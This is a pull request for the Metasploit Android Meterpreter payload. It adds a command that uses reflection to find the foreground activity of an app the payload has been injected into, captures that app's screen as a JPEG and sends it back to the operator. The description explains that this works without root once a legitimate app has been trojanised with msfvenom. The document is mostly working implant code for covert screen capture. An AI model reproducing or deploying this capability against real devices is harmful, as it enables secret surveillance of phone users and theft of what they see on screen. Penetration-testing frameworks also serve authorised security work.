### PR TITLE
android in-app screenshot

### DIFF
--- a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@@ -6,6 +6,7 @@ import android.os.Looper;
 
 import com.metasploit.meterpreter.android.stdapi_sys_config_getuid;
 import com.metasploit.meterpreter.android.*;
+import com.metasploit.meterpreter.android.stdapi_ui_desktop_screenshot;
 import com.metasploit.meterpreter.stdapi.*;
 
 import java.io.DataInputStream;
@@ -127,6 +128,7 @@ public class AndroidMeterpreter extends Meterpreter {
         mgr.registerCommand("stdapi_sys_config_localtime", stdapi_sys_config_localtime.class);
         mgr.registerCommand("stdapi_sys_process_execute", stdapi_sys_process_execute_V1_3.class);
         mgr.registerCommand("stdapi_sys_process_get_processes", stdapi_sys_process_get_processes_android.class);
+        mgr.registerCommand("stdapi_ui_desktop_screenshot", stdapi_ui_desktop_screenshot.class);
         if (context != null) {
             mgr.registerCommand("webcam_audio_record", webcam_audio_record_android.class);
             mgr.registerCommand("webcam_list", webcam_list_android.class);

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_ui_desktop_screenshot.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_ui_desktop_screenshot.java
@@ -1,0 +1,62 @@
+package com.metasploit.meterpreter.android;
+
+import android.app.Activity;
+import android.graphics.Bitmap;
+import android.view.View;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+import java.io.ByteArrayOutputStream;
+import java.lang.reflect.Field;
+import java.util.Map;
+
+public class stdapi_ui_desktop_screenshot implements Command {
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        int quality = request.getIntValue(TLVType.TLV_TYPE_DESKTOP_SCREENSHOT_QUALITY);
+        Activity activity = getActivity();
+        if (activity == null) {
+            return  ERROR_FAILURE;
+        }
+        response.add(TLVType.TLV_TYPE_DESKTOP_SCREENSHOT, grabScreen(activity, quality));
+        return ERROR_SUCCESS;
+    }
+
+    private static Activity getActivity() throws Exception {
+        Class activityThreadClass = Class.forName("android.app.ActivityThread");
+        Object activityThread = activityThreadClass.getMethod("currentActivityThread").invoke(null);
+        Field activitiesField = activityThreadClass.getDeclaredField("mActivities");
+        activitiesField.setAccessible(true);
+
+        Map<Object, Object> activities = (Map<Object, Object>) activitiesField.get(activityThread);
+        if(activities == null)
+            return null;
+
+        for (Object activityRecord : activities.values()) {
+            Class activityRecordClass = activityRecord.getClass();
+            Field pausedField = activityRecordClass.getDeclaredField("paused");
+            pausedField.setAccessible(true);
+            if (!pausedField.getBoolean(activityRecord)) {
+                Field activityField = activityRecordClass.getDeclaredField("activity");
+                activityField.setAccessible(true);
+                Activity activity = (Activity) activityField.get(activityRecord);
+                return activity;
+            }
+        }
+        return null;
+    }
+
+    private byte[] grabScreen(Activity activity, int quality) throws Exception {
+        View v1 = activity.getWindow().getDecorView().getRootView();
+        v1.setDrawingCacheEnabled(true);
+        Bitmap bitmap = Bitmap.createBitmap(v1.getDrawingCache());
+        v1.setDrawingCacheEnabled(false);
+        ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
+        bitmap.compress(Bitmap.CompressFormat.JPEG, quality, outputStream);
+        outputStream.flush();
+        return outputStream.toByteArray();
+    }
+}


### PR DESCRIPTION
I didn't think this was possible, but if you inject into an app you can capture a screenshot of it while it is in the foreground, without root.
The default app (without injection/-x) unfortunately finishes itself and so the screenshot command will always fail. However if you have used msfvenom -x and the app is running in the foreground, you can capture the buffer (but unfortunately not the notification bar, etc).
You cannot use this to capture a screenshot of any other apps (without root).